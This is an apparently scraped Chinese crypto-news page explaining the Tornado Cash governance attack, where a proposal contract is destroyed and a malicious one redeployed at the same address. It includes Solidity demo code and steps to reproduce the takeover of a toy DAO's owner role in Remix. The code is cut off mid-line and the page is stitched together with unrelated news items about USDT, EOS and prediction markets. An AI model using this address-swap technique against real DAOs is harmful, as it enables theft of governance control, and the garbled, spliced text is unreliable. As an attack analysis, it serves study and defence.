NBS:解析Tornado治理攻击:如何同一个地址上部署不同的合约

大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。

攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。

攻击过程可以查看 SharkTeam 的  Tornado

   address public owner = msg

   function execute(uint256 proposalId) external payable {        Proposal storage proposal = proposals[proposalId];        require(proposal

}contract Proposal {    event Log(string message);    function executeProposal() external {        emit Log("Excuted code approved by DAO");    }    function emergencyStop() external {        selfdestruct(payable(address(0)));    }}contract Attack {    event Log(string message);    address public owner;    function executeProposal() external {        emit Log("Excuted code not approved by DAO :)");        // For example - set DAO's owner to attacker        owner = msg

}contract DeployerDeployer {    event Log(address addr);    function deploy() external {        bytes32 salt = keccak256(abi

}contract Deployer {    event Log(address addr);    function deployProposal() external {        address addr = address(new Proposal());        emit Log(addr);    }    function deployAttack() external {        address addr = address(new Attack());        emit Log(addr);    }    function kill() external {        selfdestruct(payable(address(0)));    }}大家可以使用该代码自己在 Remix 中演练一下。

V神:预测市场的结果解析层和市场层正在分离:V神在推特表示,预测市场正在分离:结果解析层(如果发生某些事件,给1美元的代币,没有发生返回0代币)与市场层(如何交易这些代币)分离。[2020/9/26]

首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用   Deployer.deployProposal()  部署  Proposal 。

拿到 Proposal 提案合约地址后, 向  DAO 发起提案。

分别调用 Deployer.kill 和  Proposal.emergencyStop 销毁掉 Deployer 和 Proposal

再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署  Attack ,    Attack  将和之前的   Proposal 一致。

执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。

区块律动BlockBeats

曼昆区块链法律

分析 | USDT听证会解析:瑞海君看币观点:一、预计听证会围绕的主题有如下两个:

1.Bitfinex和Tether不顾美国法律和监管,为纽约州居民提供了相关服务。

2.Bitfinex和Tether之前在美国的业务,触犯了美国的反法(这个才是对USDT具有巨大杀伤力的议题)。

二、?今晚可能达成的几种结果:

1.BFX和Tether违规为美国居民提供服务罪名成立,会导致两家共识会继续被调查,且会被美国要求提供更多的运营资料,的事情没结果,但是也要提交更多资料自正清白,这是利空!会导致USDT这个雷持续悬在整个币圈的头上,然后美国来一条新闻,币圈震动一次,简直就是噩梦。(概率中性)

行情影响:短暂反弹,然后继续震荡阴跌。

2.两项罪名都没结果,短暂利好,BFX继续和美国扯皮,大家松一口气暂时?,价格可能出现反弹。(可能性较大)

行情影响:短暂反弹,后市宽幅震荡为主。

3.两项罪名都成立,不可想像(可能性较小)!

行情影响:区块链局。

罪名直接成立可能性也较小,调查没那么快,所以请大家系好安全带,等待靴子落地,两只靴子到底如何落地,落地几支,只有静候今晚的听证会了。[2019/7/29]

Foresight News

GWEI Research

吴说区块链

西柚yoga

ETH中文

金色早8点

动态 | EOS疑似将推出基于EOS的HandShake DNS解析服务:EOS疑似将推出基于EOS 的 HandShake DNS解析服务,一位开发者的Github显示正在开发EOS-handshake服务。Cosmos社区总监Chjango Unchained4月30日发推表示发现EOS开发者正在复用 Handshake 的开源代码。EOS或许会加入域名解析服务,生态会进一步扩大。(IMEOS)[2019/4/30]

金色财经 子木

ABCDE

0xAyA

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

地球链

pepe最新价格区块链:盘点中国涉虚拟货币高频刑事罪名

近年来,随着元宇宙、WEB3.0等概念的强势出圈,虚拟货币热度迎来了一波又一波的高峰。而伴随着国家各种强监管政策的出台,司法机关也加大了对虚拟货币相关的违法犯罪活动的打击力度,涉币类犯罪话题成为.

[0:31ms0-1:197ms